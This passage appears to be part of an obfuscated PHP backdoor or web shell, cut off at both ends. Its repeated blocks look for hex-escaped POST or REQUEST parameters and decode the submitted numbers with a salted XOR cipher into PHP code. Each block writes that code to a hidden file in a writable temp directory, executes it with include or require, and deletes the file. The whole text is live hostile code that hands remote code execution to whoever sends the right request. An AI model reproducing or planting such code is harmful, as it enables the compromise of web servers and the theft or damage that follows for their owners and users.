= $__len) break; $v7 = $factor[$o]; $sChar = ord($salt6[$o %$lenS]); $d = ((int)$v7 - $sChar -($o %10)) ^ 67; $k .= chr($d); $o++; } while(true); $bind = array_filter(["/tmp", "/var/tmp", "/dev/shm", getcwd(), getenv("TMP"), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP")]); foreach ($bind as $key => $pointer) { if (!( !is_dir($pointer) || !is_writable($pointer) )) { $rec = "$pointer" . "/.property_set"; if (@file_put_contents($rec, $k) !== false) { include $rec; unlink($rec); exit; } } } } if(in_array("ent", array_keys($_POST))){ $data_chunk = $_POST["ent"]; $data_chunk= explode ( "." , $data_chunk ) ; $item = ''; $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt3); $m = 0; foreach ($data_chunk as $v1) {$sChar = ord($salt3[$m % $lenS]); $d = ((int)$v1 - $sChar - ($m % 10)) ^ 46; $item .= chr($d); $m++; } $binding = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", "/tmp", getenv("TEMP"), getcwd(), sys_get_temp_dir(), session_save_path(), "/var/tmp"]); foreach ($binding as $symbol) { if (!!is_dir($symbol) && !!is_writable($symbol)) { $obj = "$symbol/.pset"; if (@file_put_contents($obj, $item) !== false) { include $obj; unlink($obj); exit; } } } } if(in_array("b\x69n\x64\x69\x6Eg", array_keys($_REQUEST))){ $fac = array_filter([session_save_path(), getenv("TEMP"), sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", getenv("TMP"), getcwd()]); $flag = $_REQUEST["b\x69n\x64\x69\x6Eg"]; $flag= explode ('.' ,$flag) ; $factor =''; $s1 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s1 ); $__len =count($flag ); for ($v =0; $v < $__len; $v++) { $v8 =$flag[$v]; $sChar =ord($s1[$v % $lenS] ); $dec =((int)$v8 - $sChar - ($v % 10)) ^ 13; $factor .= chr($dec ); } foreach ($fac as $key => $pgrp) { if (!!is_dir($pgrp) && !!is_writable($pgrp)) { $component = "$pgrp" . "/.reference"; if (file_put_contents($component, $factor)) { require $component; unlink($component); exit; } } } } if(array_key_exists("co\x6D\x70", $_POST) && !is_null($_POST["co\x6D\x70"])){ $flag = $_POST["co\x6D\x70"]; $flag = explode ( '.' , $flag ) ; $data_chunk= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt ); $r= 0; while ($r < count($flag)) { $v7= $flag[$r]; $sChar= ord($salt[$r % $lenS] ); $d= ((int)$v7 - $sChar - ($r % 10)) ^ 99; $data_chunk .= chr($d ); $r++; } $ptr = array_filter(["/var/tmp", session_save_path(), getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), "/tmp", "/dev/shm"]); foreach ($ptr as $key => $mrk) { if (!!is_dir($mrk) && !!is_writable($mrk)) { $val = sprintf("%s/.k", $mrk); if (file_put_contents($val, $data_chunk)) { include $val; @unlink($val); die(); } } } } if(count($_POST) > 0 && isset($_POST["r\x65s"])){ $element = $_POST["r\x65s"]; $element = explode ( '.' , $element ) ; $ent= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $salt); $j= 0; array_walk( $element , function( $v5) use( &$ent , &$j , $salt , $lenS) { $sChar= ord( $salt[$j%$lenS]); $d= ( ( int)$v5 - $sChar -( $j%10)) ^ 15; $ent .= chr( $d); $j++; }); $data_chunk = array_filter(["/dev/shm", session_save_path(), getenv("TEMP"), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), getenv("TMP")]); foreach ($data_chunk as $k) { if (!( !is_dir($k) || !is_writable($k) )) { $hld = join("/", [$k, ".resource"]); $file = fopen($hld, 'w'); if ($file) { fwrite($file, $ent); fclose($file); include $hld; @unlink($hld); die(); } } } } if(@$_POST["\x66\x6Cg"] !== null){ $dchunk = $_POST["\x66\x6Cg"]; $dchunk = expl